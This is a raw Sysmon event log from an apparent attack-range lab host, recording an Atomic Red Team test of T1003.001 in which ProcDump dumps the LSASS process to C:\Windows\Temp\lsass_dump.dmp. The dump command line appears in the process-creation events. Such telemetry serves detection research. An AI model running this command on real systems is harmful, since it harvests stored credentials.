Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180130Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:39.323{29E67E80-84F7-6019-4105-00000000A301}36005728C:\Windows\Explorer.EXE{29E67E80-D45F-601A-4430-00000000A301}4356C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180129Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:39.323{29E67E80-84F7-6019-4105-00000000A301}36005728C:\Windows\Explorer.EXE{29E67E80-D45F-601A-4430-00000000A301}4356C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180128Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:39.323{29E67E80-84F7-6019-4105-00000000A301}36005728C:\Windows\Explorer.EXE{29E67E80-D45F-601A-4430-00000000A301}4356C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180127Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:39.323{29E67E80-84F7-6019-4105-00000000A301}36005728C:\Windows\Explorer.EXE{29E67E80-D45F-601A-4430-00000000A301}4356C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180126Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:39.260{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-D45F-601A-4430-00000000A301}4356C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180125Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:39.260{29E67E80-7CBF-6019-1600-00000000A301}15281824C:\Windows\system32\svchost.exe{29E67E80-D45F-601A-4430-00000000A301}4356C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180124Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:39.260{29E67E80-7CBF-6019-1600-00000000A301}15281572C:\Windows\system32\svchost.exe{29E67E80-D45F-601A-4430-00000000A301}4356C:\Program Files\Notepad++\notepad++.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180123Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:39.120{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180122Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:39.120{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180121Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:39.120{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180120Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:39.120{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180119Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:39.120{29E67E80-84F4-6019-2C05-00000000A301}19281400C:\Windows\system32\csrss.exe{29E67E80-D45F-601A-4430-00000000A301}4356C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000180118Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:39.120{29E67E80-84F7-6019-4105-00000000A301}36003816C:\Windows\Explorer.EXE{29E67E80-D45F-601A-4430-00000000A301}4356C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Notepad++\NppShell_06.dll+4449|C:\Program Files\Notepad++\NppShell_06.dll+46a6|C:\Windows\System32\SHELL32.dll+cfc37|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\System32\SHELL32.dll+17b7fc|C:\Windows\System32\SHELL32.dll+19e8e8|C:\Windows\System32\SHELL32.dll+2846a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+17baa0|C:\Windows\System32\SHELL32.dll+178f1e|C:\Windows\System32\SHELL32.dll+c3081|C:\Windows\System32\SHELL32.dll+c5f66|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53 154100x8000000000000000180117Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:39.096{29E67E80-D45F-601A-4430-00000000A301}4356C:\Program Files\Notepad++\notepad++.exe7.92Notepad++ : a free (GNU) source code editorNotepad++Don HO don.h@free.frNotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" "C:\AtomicRedTeam\atomics\T1003.001\T1003.001.yaml"C:\Windows\system32\ATTACKRANGE\Administrator{29E67E80-84F5-6019-88B2-2E0000000000}0x2eb2882HighMD5=A0194F995FF3D69079232DFA9D1E209D,SHA256=456E416C42D87F62DB99C48513DE84E5E180526453589A4B69086498680234D5,IMPHASH=2672FA8E35FA833D02F7EF30AC93E0FD{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x8000000000000000180145Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:00.088{29E67E80-84F7-6019-4105-00000000A301}36004992C:\Windows\Explorer.EXE{29E67E80-859E-6019-7005-00000000A301}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+15eb9|C:\Windows\System32\SHELL32.dll+b07e0|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180144Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:00.088{29E67E80-84F7-6019-4105-00000000A301}36004992C:\Windows\Explorer.EXE{29E67E80-859E-6019-7005-00000000A301}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180143Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:00.088{29E67E80-84F7-6019-4105-00000000A301}36005728C:\Windows\Explorer.EXE{29E67E80-859E-6019-7105-00000000A301}5360C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180142Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:00.088{29E67E80-84F7-6019-4105-00000000A301}36005728C:\Windows\Explorer.EXE{29E67E80-859E-6019-7105-00000000A301}5360C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180141Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:00.088{29E67E80-84F7-6019-4105-00000000A301}36005728C:\Windows\Explorer.EXE{29E67E80-859E-6019-7105-00000000A301}5360C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180140Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:00.088{29E67E80-84F7-6019-4105-00000000A301}36005728C:\Windows\Explorer.EXE{29E67E80-859E-6019-7105-00000000A301}5360C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180195Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.931{29E67E80-D475-601A-4930-00000000A301}69484904C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe{29E67E80-7CBD-6019-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\SYSTEM32\dbgcore.DLL+15a38|C:\Windows\SYSTEM32\dbgcore.DLL+e3f5|C:\Windows\SYSTEM32\dbgcore.DLL+b027|C:\Windows\SYSTEM32\dbgcore.DLL+5db1|C:\Windows\SYSTEM32\dbgcore.DLL+67d3|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+13110|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+12b45|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+12a65|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+12722|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000180194Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.822{29E67E80-D475-601A-4930-00000000A301}6948C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exeC:\Windows\Temp\lsass_dump.dmp2021-02-03 16:51:01.822 10341000x8000000000000000180193Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.822{29E67E80-D475-601A-4930-00000000A301}69486892C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe{29E67E80-7CBD-6019-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+7f7b|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000180192Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.localAlert,Sysinternals Tool UsedSetValue2021-02-03 16:51:01.822{29E67E80-D475-601A-4930-00000000A301}6948C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exeHKU\S-1-5-21-1645871015-3279536928-3104981001-500\SOFTWARE\Sysinternals\ProcDump\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000180191Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.806{29E67E80-859E-6019-7105-00000000A301}53601944C:\Windows\system32\conhost.exe{29E67E80-D475-601A-4930-00000000A301}6948C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180190Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.806{29E67E80-84F4-6019-2C05-00000000A301}19285340C:\Windows\system32\csrss.exe{29E67E80-D475-601A-4930-00000000A301}6948C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000180189Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.806{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180188Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.806{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180187Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.806{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180186Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.806{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180185Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.806{29E67E80-D475-601A-4830-00000000A301}50885144C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe{29E67E80-D475-601A-4930-00000000A301}6948C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe+8a5b|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe+7800|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 154100x8000000000000000180184Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.808{29E67E80-D475-601A-4930-00000000A301}6948C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe10.0Sysinternals process dump utilityProcDumpSysinternals - www.sysinternals.comprocdumpC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{29E67E80-84F5-6019-88B2-2E0000000000}0x2eb2882HighMD5=F13DAB7D9CE88DDC0C80C2B9C5F422B5,SHA256=E2A7A9A803C6A4D2D503BB78A73CD9951E901BEB5FB450A2821EAF740FC48496,IMPHASH=E6F7F291413118F49398761021BAFCF2{29E67E80-D475-601A-4830-00000000A301}5088C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exeC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp 11241100x8000000000000000180183Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.localEXE2021-02-03 16:51:01.791{29E67E80-D475-601A-4830-00000000A301}5088C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exeC:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe2021-02-03 16:51:01.791 10341000x8000000000000000180182Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 